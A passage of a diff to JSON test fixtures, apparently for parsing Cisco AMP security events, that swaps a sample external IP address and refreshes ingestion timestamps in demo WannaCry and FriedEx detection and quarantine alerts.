dentity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389097100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2780,7 +2780,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2830,7 +2830,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2847,8 +2847,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965561993Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389102500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2870,7 +2870,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2911,7 +2911,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2921,8 +2921,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965564068Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389107800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2942,7 +2942,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2992,7 +2992,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3009,8 +3009,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965566175Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389113200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3032,7 +3032,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3082,7 +3082,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3099,8 +3099,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965568225Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389118500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3122,7 +3122,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3172,7 +3172,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3189,8 +3189,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965570286Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389124100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3212,7 +3212,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3271,7 +3271,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3288,8 +3288,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965572358Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.389129500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3311,7 +3311,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3374,7 +3374,7 @@ "c78f4c22dd195a1791472a2c271a0c85b53900d9" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3387,8 +3387,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965574391Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", + "ingested": "2021-12-09T13:35:55.389134900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity 